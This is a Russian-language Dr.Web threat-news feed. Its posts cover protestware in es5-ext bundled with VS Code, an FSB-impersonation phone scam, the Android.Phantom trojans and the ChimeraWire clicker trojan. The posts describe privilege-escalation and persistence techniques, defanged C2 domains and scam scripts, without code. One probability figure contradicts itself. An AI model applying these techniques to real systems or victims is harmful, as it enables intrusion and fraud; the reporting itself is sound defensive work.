Горячая лента угроз

Антироссийский призыв в консоли разработчика вместе с обновлением Microsoft Visual Studio Code

Fri, 17 Apr 2026 15:44:22 GMT

«Доктор Веб» сообщает, что при установке новой версии популярного редактора кода Microsoft Visual Studio Code (MS VS Code) Dr.Web детектирует вредоносный JS файл внутри. Данный вредоносный код был добавлен в javascript-библиотеку "es5-ext" еще в 2022 году и до сих пор в ней содержится.

Что делает вредоносный JS-файл

Вредоносный файл демонстрирует в консоли разработчика призыв с антироссийской позицией касательно СВО:

Данный вредоносный скрипт запускается при соответствии условия часового пояса российских городов. Их полный список можно увидеть на скриншоте: среди них Анадырь, Барнаул, Калининград, Самара и многие другие.

Чем опасен данный код и почему мы его детектируем

Разработчик пакета es5-ext добавил в код вывод всплывающего сообщения в консоль при определенных условиях. Специалисты «Доктор Веб» классифицируют данное поведение как злонамеренную вставку вредоносного кода, не имеющего никакого отношения к функционалу библиотеки, направленную против части пользователей на основе региональной принадлежности, что является достаточным основанием для детектирования.

На данный момент код выполняет только агитационную функцию, но разработчик в любой момент может заменить данный код и наделить его другими функциями: например, с помощью него он сможет удалить все ваши данные с компьютера. Такие случаи в нашей практике уже фиксировались.

Несмотря на то, что о наличии данного кода в библиотеке профессиональному сообществу известно давно, компания Microsoft инкорпорировала этот пакет в свое программное обеспечение в качестве зависимости.

Последствия для пользователей

В результате этого решения все пользователи, обновляющие MS VS Code автоматически, получают вместе с обновлением и «малварный» пакет. Срабатывание антивируса происходит именно в момент загрузки или распаковки обновления, содержащего скомпрометированную библиотеку.

Игорь Здобнов, руководитель антивирусной лаборатории «Доктор Веб»:
Мотивы, по которым Microsoft включила в зависимость заведомо сомнительный пакет, нам неведомы. Мы рекомендуем пользователям обратить внимание на срабатывания антивируса и, при необходимости, временно приостановить автоматическое обновление до выяснения обстоятельств со стороны разработчика.

«Доктор Веб» настоятельно рекомендует пользователям проверять все загружаемые обновления и обращать внимание на предупреждения антивирусного программного обеспечения. Последняя версия MS VS Code, где нет указанной проблемы — 1.115.

«У вас произошла утечка персональных данных!». Анатомия мошеннического звонка

Mon, 09 Feb 2026 11:35:33 GMT

Телефонное мошенничество остается насущной проблемой нашего общества, несмотря на постоянное противодействие со стороны государства, банков и операторов связи. Никто не застрахован от обмана: в ловушку преступников может попасть как ребенок или пенсионер, так и искушенный взрослый.

Чтобы детально разобрать мошенническую схему и предостеречь других потенциальных жертв, сотрудница «Доктор Веб» «прошла» весь путь от первого звонка до финальной попытки выманить деньги. Это была сложносоставная комбинация с применением различных методов социальной инженерии.

Этап 1. Давление авторитетом

Мошенники атаковали коллектив компании «Доктор Веб» еще с декабря 2024 года. Они выходили на разных сотрудников с одним и тем же заходом: произошла утечка конфиденциальных данных, началось расследование, с вами свяжется куратор из ФСБ. Коммуникация всегда велась якобы от лица генерального директора или другого представителя руководящего звена компании. Поскольку данный подход не привел к желаемым результатам, преступники сменили тактику и сфокусировались на пожилых сотрудниках.

Пенсионеры — наиболее привлекательная для мошенников группа населения. Они более доверчивы, меньше разбираются в современных технологиях и имеют сформировавшееся уважение к представителям власти. Кроме того, пенсионеры уже не работают в компании (по крайней мере, именно так считают мошенники), поэтому хуже разбираются в том, кто текущий руководитель, как он разговаривает, что у него за характер.

Утром на телефон нашей сотрудницы, для краткости назовем ее N, поступил звонок через Телеграм. Звонящий представился генеральным директором «Доктор Веб», что подтверждалось его реальными фото и именем/фамилией. Но его аккаунт был создан менее суток назад, номер телефона скрыт, а голос и манера общения резко отличались от привычных. Злоумышленник ввел N в контекст произошедшей ситуации. Якобы произошла утечка персональных данных внутри компании. Для расследования инцидента создана специальная комиссия. Составлен список лиц, которые обязаны дать показания о случившемся. N также внесена в этот перечень, поэтому в течение дня ей позвонит сотрудник ФСБ. Планируемые каналы связи: мессенджер MAX или Телеграм. Если не получится связаться с N через них, поступит обычный звонок на мобильный номер. И поскольку скомпрометированы в том числе личные данные самой N, ей следует с полной серьезностью отнестись к разговору.

Примечателен факт, что мошенники всегда действуют под маской вышестоящего руководителя, пытаясь задавить авторитетом. Но зачастую это прикрытие и выдает их: они не знают внутренних взаимоотношений, корпоративной культуры, порядка принятия решений внутри компании, что раскрывает их ложь. Поэтому и стали атаковать пенсионеров!

Самым примечательным моментом данного этапа стало использование мессенджеров. Сотрудники правоохранительных органов всегда звонят напрямую на телефонный номер. Звонки через Телеграм или MAX — это коммуникация через интернет, что не предусмотрено для силовых ведомств.

Этап 2. Демонстрация легитимности

Далее в игру вступает «представитель ФСБ» — майор, старший следователь по особо важным делам. Он звонит N через Телеграм, но разговор не получается из-за отсутствия соединения. Лжемайор присылает сообщение, в котором представляется и прикрепляет фото своего удостоверения.

Подобные фотографии рассчитаны на доверчивых и невнимательных людей или тех, кто никогда не имел взаимоотношений с силовыми ведомствами:

фотография удостоверения на столе ничего не доказывает — мы не видим лица автора съемки, оно может не совпадать с фото в документе,
удостоверение предъявляют только при личном контакте, а не посылают через интернет,
сотрудники «Доктор Веб» за несколько минут нашли в открытом доступе шаблоны подобных документов, куда с помощью ИИ можно вставить любое ФИО и фото. Получившиеся изображения неотличимы от подлинных фотографий.

Поскольку дозвониться через Телеграм не получилось, лжемайор предлагает продолжить общение в национальном мессенджере МАХ, который позиционируется как безопасный. Вот только он не может найти N в мессенджере и предлагает ей самой прислать приглашение для запуска чата. Но даже после этого у мошенника не получается дозвониться, так как у N стоит ограничение — звонки только от абонентов из списка контактов. Поэтому он предлагает N самостоятельно позвонить в чате. Эти манипуляции необходимы для создания иллюзии достоверности и укрепления атмосферы доверия, ведь слишком быстрый и простой контакт может навести на подозрения. В итоге связь была установлена и разговор продолжился в течение часа.

Этот небольшой, но важный эпизод показывает, что введенные не так давно ограничения средств связи не работают так, как было задумано. Злоумышленники используют социальную инженерию, чтобы заставить жертв звонить им самостоятельно — без разницы где. Не стоит вопрос безопасности и защищенности MAX или Телеграм, поскольку тот или другой мессенджер выступают просто в роли инструмента связи. Статистика утверждает, что количество мошеннических звонков снизилось — но взамен выросло их качество. Преступники перестали практиковать массовые обзвоны и сосредоточились на точечных операциях.

Мы не будем подробно пересказывать все перипетии беседы, остановимся на нескольких моментах, важных для понимания техники обмана. Прежде всего лжемайор пытался убедить N в подлинности своей личности. Он предложил зайти на официальный сайт Федеральной службы безопасности, перейти в раздел «Справочная информация», затем выбрать конкретный округ Москвы, посмотреть контактный номер подразделения и своими глазами убедиться, что контакт в Телеграме совпадает. Цифры действительно были те же, вот только в профиле контакта этот телефонный номер указан в строке «Имя». А в самом мессенджере MAX контакт мошенника зарегистрирован со скрытым номером.

Этап 3. Эскалация и прессинг

Лжемайор настаивал и даже требовал соблюдения строгой конфиденциальности во время беседы и после нее. Он несколько раз заострил внимание, что собеседница должна находиться в комнате одна и никто не имеет права помешать разговору — даже члены семьи. Для большего эффекта были названы имена домочадцев N. Далее по ходу разговора притворяющийся майором несколько раз переспрашивал, одна ли N в комнате, и подчеркивал необходимость соблюдения строжайшей секретности.

По мере развития беседы раскручивалась мошенническая легенда, параллельно с усилением напряжения. Злоумышленник подтвердил слова первого звонившего о том, что произошла утечка персональных данных и силовое ведомство подозревает кого-то из руководителей компании или HR-специалистов. Росфинмониторингом была пресечена попытка крупного денежного перевода от лица N на нужды ВСУ. Приведем небольшой отрывок, чтобы продемонстрировать отработку возражений:

N: Простите, но тут какая-то ошибка. Я не держу такие большие суммы на счетах, поэтому их просто физически невозможно перевести куда-либо.
Лжемайор: Попытка перевода могла быть совершена и с кредитного счета, не обязательно депозит.
N: Возможно, но я специально для таких случаев оформила самозапрет на оформление кредитов.
Лжемайор: К сожалению, самозапрет на дает 100% гарантии. Некоторые нечистоплотные сотрудники коммерческих банков могут игнорировать предписания ради собственной выгоды. Учтите, если мы зафиксируем очередную попытку перевода, вы будете главной подозреваемой. Придется возбуждать дело и разбираться.

Наша сотрудница была готова к подобному повороту событий, но, как правило, такого рода обвинения производят ошеломляющий эффект. Речь идет не о рядовой краже — об измене Родине. Для людей пожилого возраста это чудовищное преступление. После таких слов сложно сохранить присутствие духа, рассуждать логично, сосредоточиться на несостыковках. Ситуацию усугубляет осознание того, что жертве предъявляют обвинения, которые практически невозможно опровергнуть: кто-то где-то на стороне воспользовался персональными данными, но главный подозреваемый — вы!

Для усиления психологического давления, лжемайор присылал изображения разных документов: письмо из Росфинмониторинга в ФСБ с просьбой об инициировании расследования и повестка о вызове в качестве подозреваемого. Наши юристы внимательно изучили их и выделили детали, указывающие на фальшивое происхождение. Мы приводим только некоторые из них, так как детальный публичный разбор ошибок в фальшивых документах потенциально вооружает преступников:

повестки не направляются через мессенджеры, об этом неоднократно заявляли представители правоохранительных органов;
текст повестки краток и не содержит разъясняющих и угрожающих формулировок;
согласно ст. 188 УПК РФ «Порядок вызова на допрос» повесткой на допрос может быть вызван только свидетель или потерпевший. Подозреваемого задерживают, согласно ст. 92 УПК РФ «Порядок задержания подозреваемого». Такой документ, как «Повестка о вызове подозреваемого на допрос» не может существовать согласно юридическим нормам.

Люди не в состоянии обращать внимание на подобные нюансы, оказавшись под давлением. 

Этап 4. Кульминация комбинации

Переходим к главному пункту мошенничества, ради которого затевалась комбинация. Лжемайор перечислил N банки, где находятся ее счета: Сбер, Альфа, Озон и ОТП-банк. Последний — некая венгерская кредитная организация, через которую будто бы совершаются переводы на Украину. Заботливый лжемайор высказал пожелание предотвратить возможное преступление и защитить N от карающей длани Фемиды. Для этого он передаст заявку в ЦБ, откуда с потенциальной жертвой свяжется сотрудник и поможет «все правильно сделать» (предположительно, перевести деньги на безопасный счет).

К этому моменту N уже определила основные черты схемы и решила прервать общение. Но злоумышленник не хотел отпускать добычу. Прикрываясь статьей 205.6 УК РФ «Несообщение о преступлении», он заявил, что ему бы очень не хотелось, чтобы N потом пыталась связаться с ним, обрывая его телефон с просьбой помочь. Но поскольку N отказалась от сотрудничества, лжемайор уведомил, что вынужден обратиться к регулятору для блокировки счетов и наложения ареста на имущество, в том числе ближайших родственников, а далее прислать повестку. На этом общение с лжемайором завершилось.

Этап 5. Провоцирование повторного контакта

Поскольку мошенники не добились своей главной цели, они попытались спровоцировать N саму связаться с ними. Буквально через несколько минут героине позвонили из Сбера и попросили подтвердить подачу заявки на блокировку карты. После отрицательного ответа карта заблокирована не была.

В свою очередь, Альфа-банк прислал несколько СМС о блокировке каждой из карт. Для решения проблемы N пришлось позвонить на горячую линию и сделать запрос об отмене. Как оказалось, одна из соучастниц мошенничества ранее также позвонила на горячую линию и представилась N. Назвав полностью ФИО, а также дату рождения, преступница попросила заблокировать карты. Для сотрудника банка этих данных оказалось достаточно.

Выводы

Инцидент не стал удачным для мошенников благодаря принятым предупредительным мерам в «Доктор Веб». Атаки активно происходили в течение всего 2025 года, поэтому все сотрудники компании были неоднократно проинструктированы и имели четкие внутренние регламенты, как действовать в подобных случаях.

Сотрудница N, будучи опытным и высококвалифицированным специалистом, провела диалог с мошенниками не спонтанно, а осознанно и хладнокровно, следуя внутренним инструкциям. Именно они не позволили эмоциям взять верх над логикой и вниманием к деталям. Контакт помог собрать ценную информацию без какого-либо риска или ущерба, превратив потенциальную угрозу в детальный разбор мошеннической схемы.

Таким образом, устойчивость к мошенничеству строится на:

четких корпоративных правилах, дающих сотрудникам однозначный алгоритм действий,
постоянном обучении и регулярном повышении осведомленности, превращающих каждого сотрудника в осознанного участника системы безопасности.

Именно подобный комплексный и системный подход, в отличие от технических блокировок, создает настоящий щит, способный противостоять социальной инженерии, и вселяет в сотрудников уверенность в своей правоте. Мы хотим обратить особое внимание руководителей организаций, что именно от их активной роли зависит, насколько весь коллектив будет готов к подобным атакам и манипуляциям.

Трояны семейства Android.Phantom проникают в смартфоны вместе с играми и пиратскими модами популярных приложений. Они используют машинное обучение и видеотрансляции для накрутки кликов

Wed, 21 Jan 2026 05:00:00 GMT

21 января 2026 года

Специалисты антивирусной лаборатории «Доктор Веб» обнаружили и исследовали новое семейство троянов с функциональностью кликера. Их объединяет одна особенность: они либо управляются с сервера hxxps[:]//dllpgd[.]click, либо загружаются и выполняются по команде с него. Вредоносное ПО данного типа заражает смартфоны на ОС Android.

Один из каналов распространения троянов — официальный каталог приложений для устройств Xiaomi GetApps.

Нам удалось отследить несколько мобильных игр, которые содержат вредоносное ПО: Creation Magic World (более 32 тыс. скачиваний), Cute Pet House (>34 тыс. скачиваний), Amazing Unicorn Party (>13 тыс. скачиваний), Академия мечты Сакура (>4 тыс. скачиваний), Theft Auto Mafia (>61 тыс. скачиваний), Open World Gangsters (>11 тыс. скачиваний). Все зараженные игры выложены от лица одного разработчика, SHENZHEN RUIREN NETWORK CO., LTD., троянцы вшиты в них и запускаются вместе с приложениями.

В первоначальных версиях игр вредоносного ПО не было. 28/29 сентября разработчик публикует обновления для игр, в которые встроен троян Android.Phantom.2.origin. Он работает в двух режимах, которые в коде программы условно называются режим сигнализации (signaling) и фантом (phantom).

В режиме phantom вредоносное ПО использует скрытый от пользователя встроенный браузер на основе виджета WebView. В него по команде с сервера hxxps[:]//playstations[.]click загружается целевой сайт для накрутки кликов и файл JavaScript «phantom». Последний содержит в себе сценарий для автоматизации действий на рекламных объявлениях загруженного сайта и фреймворк машинного обучения TensorFlowJS. Модель для этого фреймворка загружается с сервера hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com в директорию приложения. В сценариях для работы с некоторыми видами рекламы Android.Phantom.2.origin размещает браузер на виртуальном экране и делает скриншоты. Троян анализирует их с помощью модели для фреймворка TensorFlowJS, а затем кликает по обнаруженным элементам.

В альтернативном режиме signaling троянец подключается к стороннему серверу при помощи WebRTC. Эта технология позволяет браузерам и приложениям устанавливать прямое соединение для обмена данными, аудио и видео в режиме реального времени без установки дополнительного ПО. В режиме signaling уже упомянутый hxxps[:]//dllpgd[.]click выполняет роль сигнального сервера, устанавливающий соединения между узлами WebRTC. Также данный сервер определяет режим работы трояна, phantom или signaling. Задачи с целевыми сайтами приходят от hxxps[:]//playstations[.]click. Далее Android.Phantom.2.origin тайно от пользователя транслирует злоумышленникам видео виртуального экрана с загруженным в браузер сайтом. Троянец дает возможность подключенному узлу WebRTC удаленно управлять браузером на виртуальном экране: кликать, скроллить, вводить или вставлять текст в форму для ввода.

15/16 октября вышеуказанные игры получили еще одно обновление. В дополнение к Android.Phantom.2.origin в них встроили модуль Android.Phantom.5. Он является дроппером, который содержит внутри себя загрузчик удаленного кода Android.Phantom.4.origin. Эта программа загружает еще несколько троянов, предназначенных для имитации кликов на различных сайтах. Эти модули проще кликера Android.Phantom.2.origin — они не используют машинное обучение или видеотрансляции, а руководствуются сценариями для кликов, написанных на JavaScript.

Чтобы использовать технологию WebRTC на Android, трояну необходимо подключить специальную библиотеку с Java API, которая не входит в состав стандартной ОС и скачанных приложений. Поэтому поначалу троян работал преимущественно в режиме phantom. С добавлением в приложения Android.Phantom.5, троян Android.Phantom.2.origin получил возможность использовать загрузчик удаленного кода Android.Phantom.4.origin для загрузки необходимой библиотеки.

Злоумышленники используют также и другие каналы распространения троянов Android.Phantom.2.origin и Android.Phantom.5. К примеру, моды музыкального стриминга Spotify с разблокированными premium функциями. Они размещаются на различных сайтах, вот несколько примеров:

Сайт Spotify Plus

Сайт Spotify Pro

И в специальных телеграм-каналах:

Spotify Pro
(54 400 подписчиков)

Spotify Plus – Official
(15 057 подписчиков)

Моды Spotify, размещенные на сайтах и в указанных на скриншотах телеграм-каналах, содержат Android.Phantom.2.origin и библиотеку для организации связи по стандарту WebRTC под Android.

Кроме модов Spotify, злоумышленники вшивают трояны в моды других популярных приложений: YouTube, Deezer, Netflix и др. Они размещены на специальных сайтах с модами:

Сайт Apkmody

Сайт Moddroid

Сайт Moddroid содержит раздел «Выбор редакции». Из 20 приложений в нем только 4 были чистыми. Остальные 16 содержали трояны семейства Android.Phantom. Приложения на этих двух сайтах загружаются с одного CDN-сервера hxxps[:]//cdn[.]topmongo[.]com. У этих сайтов есть свои телеграм-каналы, где пользователи скачивают зараженные троянам моды:

Moddroid.com
(87 653 подписчика)

Apkmody Chat
(6 297 подписчиков)

Также для своих целей преступники используют сервера Discord. Самый большой из них — Spotify X, около 24 тысяч подписчиков.

Администраторы Discord-серверов не стесняются напрямую предлагать зараженные моды. Например, на скриншоте выше администратор от лица сервера предлагает скачать мод музыкального стриминга Deezer вместо Spotify, поскольку последний перестал работать.

По ссылке скачивается рабочий мод. Его код защищен коммерческим упаковщиком, внутри которого скрывается троян Android.Phantom.1.origin. Это загрузчик удаленного кода, по команде с сервера hxxps[:]//dllpgd[.]click он загружает уже нам знакомые Android.Phantom.2.origin, Android.Phantom.5 и троян-шпион Android.Phantom.5.origin. Последний отправляет информацию об устройстве злоумышленникам, в том числе номер телефона, геолокацию, список установленных приложений.

Этот скриншот с сервера показывает, на каких языках говорят пользователи, которые становятся объектами заражения. Для доступа к чатам на языках, отличных от английского, необходимо поставить реакцию с соответствующим флагом. Больше всего отметились пользователи, говорящие на испанском, французском, немецком, польском и итальянском языках (не считая английского, который является основным языком сервера). Также администраторы сервера не предусмотрели чатов для многих стран Азии.

Трояны могут нанести существенный вред владельцам зараженных устройств. Перечислим несколько возможных исходов:

Невольное соучастие. Смартфон пользователя может быть использован в качестве бота при DDoS-атаке, тем самым делая владельца невольным соучастником киберпреступления.
Незаконная активность. Через устройство злоумышленники могут совершать незаконную онлайн-деятельность, к примеру, использовать смартфон в мошеннических схемах или рассылать спам-сообщения.
Повышенное потребление заряда и трафика. Посторонняя деятельность разряжает аккумулятор и расходует интернет-трафик.
Утечка персональных данных. Android.Phantom.5.origin является шпионом и может передавать данные об устройстве и владельце.

Трояны этого семейства представляют угрозу для владельцев мобильных устройств на Android, не защищенных актуальным антивирусным ПО. Российские пользователи испытывают трудности с регистрацией в зарубежных приложениях или оплатой подписок. Ситуация подталкивает искать и использовать альтернативные, зачастую полулегальные, способы получения услуг этих компаний. Эта ситуация на руку вирусописателям, ведь пользователям приходится рисковать и доверять сомнительным вариантам. Особую группу риска составляют дети, которые не думают о правилах цифровой гигиены, желая всего лишь поиграть, послушать музыку или посмотреть видеоклипы.

Мы рекомендуем не скачивать моды на сомнительных сайтах и в каналах. Как правило, проверка источников модов или приложений требует времени, опыта и насмотренности. Поэтому лучший вариант обеспечить себе и своим близким гарантированное спокойствие — использовать Dr.Web Security Space для мобильных устройств. Он защитит не только ваши смартфоны, но и другие умные устройства: игровые консоли, планшеты, smartTV.

Индикаторы компрометации
Подробнее о Android.Phantom.1.origin
Подробнее о Android.Phantom.2.origin
Подробнее о Android.Phantom.3
Подробнее о Android.Phantom.4.origin
Подробнее о Android.Phantom.5
Подробнее о Android.Phantom.5.origin

Беллерофонту такое и не снилось. Троян ChimeraWire накручивает популярность сайтов, искусно притворяясь человеком

Mon, 08 Dec 2025 07:00:00 GMT

Скачать PDF

8 декабря 2025 года

Введение

В ходе анализа одной из партнерских программ специалисты компании «Доктор Веб» обнаружили уникальное ВПО с функциональностью кликера, получившее наименование Trojan.ChimeraWire. Оно работает на компьютерах под управлением ОС Windows и основано на проектах с открытым исходным кодом zlsgo и Rod для автоматизированного управления веб-сайтами и веб-приложениями.

Trojan.ChimeraWire позволяет злоумышленникам имитировать действия пользователей и накручивать поведенческий фактор веб-сайтов, искусственно поднимая их рейтинг в выдаче поисковых систем. Для этого вредоносная программа выполняет поиск нужных интернет-ресурсов в системах Google и Bing, после чего открывает их. Она также имитирует действия пользователей, самостоятельно нажимая на ссылки на загруженных сайтах. Троян совершает все вредоносные действия через браузер Google Chrome, который он скачивает с определенного ресурса и запускает в скрытом режиме отладки по протоколу WebSocket.

Trojan.ChimeraWire попадает на компьютеры в результате работы нескольких вредоносных программ-загрузчиков. Они используют различные техники повышения привилегий на основе эксплуатации уязвимостей класса DLL Search Order Hijacking, а также антиотладочные приемы с целью избежать обнаружения. Наша антивирусная лаборатория отследила как минимум 2 цепочки заражения с их участием. В одной из них центральное место занимает вредоносный скрипт Python.Downloader.208, а в другой — вредоносная программа Trojan.DownLoader48.61444, которая по принципу работы схожа с Python.Downloader.208 и фактически выступает его альтернативой.

В данном исследовании мы рассмотрим особенности Trojan.ChimeraWire и вредоносных программ, которые доставляют его на устройства пользователей.

Первая цепочка заражения

Схема, иллюстрирующая первую цепочку заражения

Первая цепочка начинается с трояна Trojan.DownLoader48.54600. Он проверяет, не работает ли в искусственной среде, и завершает работу, если обнаруживает признаки виртуальной машины или режима отладки. Если таких признаков нет, троян скачивает с C2-сервера ZIP-архив python3.zip. В нем находится вредоносный Python-скрипт Python.Downloader.208, а также необходимые для его работы вспомогательные файлы — в частности, вредоносная библиотека ISCSIEXE.dll (Trojan.Starter.8377). Trojan.DownLoader48.54600 распаковывает архив и запускает скрипт. Тот является второй ступенью заражения и представляет собой загрузчик, который скачивает с C2-сервера следующую стадию.

Поведение Python.Downloader.208 зависит от того, какими правами он обладает при запуске. Если скрипт запущен без прав администратора, он пытается их получить. Для этого извлеченный вместе с ним Trojan.Starter.8377 копируется в каталог %LOCALAPPDATA%\Microsoft\WindowsApps. Кроме того, создается скрипт runs.vbs, который в дальнейшем будет использован для повторного запуска Python.Downloader.208.

Далее Python.Downloader.208 запускает системное приложение %SystemRoot%\SysWOW64\iscsicpl.exe. Из-за наличия в нем уязвимости класса DLL Search Order Hijacking оно автоматически загружает троянскую библиотеку ISCSIEXE.dll, имя которой совпадает с именем легитимного компонента ОС Windows.

В свою очередь, Trojan.Starter.8377 запускает VBS-скрипт runs.vbs, и тот повторно исполняет Python.Downloader.208 — уже с правами администратора.

При запуске с необходимыми привилегиями Python.Downloader.208 скачивает с C2-сервера защищенный паролем архив onedrive.zip. В нем находится следующая стадия заражения — вредоносная программа Trojan.DownLoader48.54318 в виде библиотеки с именем UpdateRingSettings.dll — и необходимые для ее работы вспомогательные файлы (например, легитимное приложение OneDrivePatcher.exe из ОС Windows с действительной цифровой подписью, относящееся к ПО OneDrive).

После распаковки архива Python.Downloader.208 создает задачу в системном планировщике на запуск программы OneDrivePatcher.exe при старте системы. Далее он запускает это приложение. Из-за наличия в нем уязвимости DLL Search Order Hijacking оно автоматически загружает вредоносную библиотеку UpdateRingSettings.dll, имя которой совпадает с именем компонента ПО OneDrive.

Получив управление, Trojan.DownLoader48.54318 проверяет, не работает ли он в искусственной среде. При обнаружении одного из признаков работы в виртуальной машине или в режиме отладки он прекращает работу.

Если такие признаки не обнаруживаются, троянская библиотека пытается скачать с C2-сервера полезную нагрузку, а также ключи шифрования для ее расшифровки.

Расшифрованная полезная нагрузка представляет собой ZLIB-контейнер, внутри которого находится шеллкод и исполняемый файл. После расшифровки контейнера Trojan.DownLoader48.54318 пытается распаковать его. Если это не удается, то троян самоудаляется, а сам процесс завершает работу. В случае успеха управление передается шеллкоду, задача которого — разжать идущий вместе с ним исполняемый файл. Данный файл является последней стадией заражения — целевым трояном Trojan.ChimeraWire.

Вторая цепочка заражения

Вторая цепочка начинается с вредоносной программы Trojan.DownLoader48.61444. При запуске она проверяет наличие прав администратора и при их отсутствии пытается их получить. Троян использует технику Masquerade PEB для обхода системы защиты, маскируясь под легитимный процесс explorer.exe.

Затем он вносит патч в копию системной библиотеки %SystemRoot%\System32\ATL.dll. Для этого Trojan.DownLoader48.61444 считывает ее содержимое, добавляет в нее расшифрованный байт-код и путь до своего файла, после чего сохраняет модифицированную версию в виде файла dropper в той же директории, где он расположен. Далее троян инициализирует объекты COM-модели оболочки Windows для сервиса %SystemRoot%\System32\wbem и измененной библиотеки. Если инициализация проходит успешно, Trojan.DownLoader48.61444 пытается получить права администратора через использование COM-интерфейса CMSTPLUA, эксплуатируя уязвимость, характерную для некоторых старых COM-интерфейсов.

В случае успеха модифицированная библиотека dropper копируется в каталог %SystemRoot%\System32\wbem в виде файла ATL.dll. После этого Trojan.DownLoader48.61444 запускает системную оснастку управления WMI WmiMgmt.msc. В результате происходит эксплуатация уязвимости DLL Search Order Hijacking в системном приложении mmc.exe, которое автоматически загружает библиотеку %SystemRoot%\System32\wbem\ATL.dll с патчем. Она, в свою очередь, повторно запускает Trojan.DownLoader48.61444, но уже с правами администратора.

Схема работы Trojan.DownLoader48.61444 при отсутствии прав администратора

При запуске от имени администратора Trojan.DownLoader48.61444 исполняет несколько PowerShell-скриптов для скачивания полезной нагрузки с C2-сервера. Одним из загружаемых объектов является ZIP-архив one.zip. В нем находятся файлы, аналогичные файлам из архива onedrive.zip из первой цепочки (в частности, легитимная программа OneDrivePatcher.exe и вредоносная библиотека UpdateRingSettings.dll — Trojan.DownLoader48.54318).

Trojan.DownLoader48.61444 распаковывает архив и в системном планировщике создает задачу на автозапуск OneDrivePatcher.exe при загрузке системы. Троян также непосредственно запускает это приложение. Так же, как и в первой цепочке, при запуске в OneDrivePatcher.exe происходит эксплуатация уязвимости DLL Search Order Hijacking и автоматическая загрузка троянской библиотеки UpdateRingSettings.dll. Далее цепочка заражения повторяет первый сценарий.

При этом Trojan.DownLoader48.61444 скачивает и второй ZIP-архив: two.zip. В нем находится вредоносный скрипт Python.Downloader.208 (update.py), а также файлы, необходимые для его запуска. Среди них — Guardian.exe — переименованный консольный интерпретатор языка Python pythonw.exe.

После распаковки архива Trojan.DownLoader48.61444 создает в системном планировщике задачу на автозапуск Guardian.exe при загрузке системы. Кроме того, он непосредственно исполняет через это приложение вредоносный скрипт Python.Downloader.208.

Частично дублируя первую цепочку заражения, злоумышленники, по всей видимости, стремились повысить вероятность успешной загрузки Trojan.ChimeraWire в целевые системы.

Схема работы Trojan.DownLoader48.61444 с правами администратора

Trojan.ChimeraWire

Trojan.ChimeraWire получил свое имя на основе сочетания слов «chimera» (в переводе с англ. «химера» — мифическое существо с частями тел нескольких животных) и «wire» (в переводе с англ. «провод»). Слово «chimera» описывает гибридную природу применяемых злоумышленниками методик: использование троянов-загрузчиков, написанных на разных языках, а также антиотладочные техники и эскалация привилегий в процессе заражения. Кроме того, оно отражает то, что троян представляет собой комбинацию различных фреймворков, плагинов и легального ПО, через которое осуществляется скрытое управление трафиком. Отсюда вытекает второе слово «wire»: оно отсылает к невидимой и вредоносной работе трояна с сетью.

Попадая на целевой компьютер, Trojan.ChimeraWire скачивает со стороннего сайта ZIP-архив chrome-win.zip с браузером Google Chrome для ОС Windows. Отметим, что на этом ресурсе также хранятся архивы со сборками Google Chrome и для других систем, таких как Linux и macOS — в том числе для различных аппаратных платформ.

Сайт с различными сборками браузера Google Chrome, откуда троян загружает необходимый архив

После скачивания браузера Trojan.ChimeraWire пытается незаметно установить в него расширения NopeCHA и Buster, предназначенные для автоматизированного распознавания капчи (CAPTCHA). Данные расширения будут в дальнейшем использоваться трояном в процессе его работы.

Далее он запускает браузер в режиме отладки без видимого окна, что позволяет выполнять вредоносную деятельность, не привлекая внимания пользователя. После этого происходит подключение к выбранному автоматически порту отладки по протоколу WebSocket.

Вслед за этим троян переходит к получению заданий. Он отправляет запрос на C2-сервер и получает в ответ base64-строку, в которой скрыта зашифрованная алгоритмом AES-GCM конфигурация в формате JSON.

Пример конфигурации, которую трояну передает C2-сервер

В ней находятся задания и связанные с ними параметры:

целевая поисковая система (поддерживаются системы Google и Bing);
ключевые фразы для поиска сайтов в заданной поисковой системе и их последующего открытия;
максимальное количество последовательных переходов по веб-страницам;
случайные распределения для выполнения автоматических кликов на веб-страницах;
время ожидания загрузки страниц;
целевые домены.

Для дополнительной имитации деятельности реального человека и обхода систем, отслеживающих постоянную активность, в конфигурации также предусмотрены параметры, отвечающие за паузы между сессиями работы.

Имитация кликов мышью пользователем

Trojan.ChimeraWire способен выполнять клики следующих видов:

для навигации по поисковой выдаче;
для открытия найденных релевантных ссылок в новых фоновых вкладках.

Вначале Trojan.ChimeraWire через нужную поисковую систему выполняет поиск сайтов по доменам и ключевым фразам, указанным в конфигурации. Далее он открывает полученные в поисковой выдаче сайты и находит на них все HTML-элементы, которые определяют гиперссылки. Троян помещает их в массив данных и перемешивает его, чтобы объекты в нем располагались в последовательности, отличной от последовательности на веб-странице. Это делается для обхода антибот-защиты сайтов, которая может отслеживать порядок нажатий.

Затем Trojan.ChimeraWire проверяет, работоспособны ли найденные ссылки и совпадают ли строки в них с заданным шаблоном из конфигурации, после чего подсчитывает общее количество совпадений. Дальнейшие действия трояна зависят от получившегося числа.

Если на странице было выявлено достаточное количество подходящих ссылок, Trojan.ChimeraWire сканирует страницу и сортирует найденные ссылки по релевантности (наиболее соответствующие ключевым словам ссылки идут первыми). После этого выполняется клик по одной или нескольким подходящим ссылкам.

Если же совпадений с заданным шаблоном недостаточно или их нет вовсе, вредоносная программа использует алгоритм с вероятностной моделью поведения, который максимально имитирует действия настоящего пользователя. На основе параметров из конфигурации при помощи взвешенного случайного распределения Trojan.ChimeraWire определяет количество ссылок, по которым необходимо перейти. Например, распределение ["1:90", "2:10"] означает, что Trojan.ChimeraWire кликнет 1 ссылку с вероятностью 90%, и 2 ссылки — с вероятностью 20%. Таким образом, с большой долей вероятности вредоносная программа должна перейти по одной ссылке. Троян случайным образом выбирает ссылку из составленного ранее массива и выполняет клик.

После каждого перехода по ссылке из поисковой выдачи и выполнения кликов на загружаемой странице троян, в зависимости от задачи, возвращается на предыдущую вкладку или переходит к следующей. Алгоритм действий повторяется до тех пор, пока не будет исчерпан лимит по кликам для целевых веб-сайтов.

Ниже представлены примеры сайтов, параметры для взаимодействия с которыми поступали трояну в заданиях от C2-сервера:

Подробные технические описания трояна ChimeraWire и вредоносных программ, участвующих в его загрузке, находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Подробнее о Trojan.ChimeraWire
Подробнее о Trojan.DownLoader48.54600
Подробнее о Trojan.Starter.8377
Подробнее о Python.Downloader.208
Подробнее о Trojan.DownLoader48.54318
Подробнее о Trojan.DownLoader48.61444

Заключение

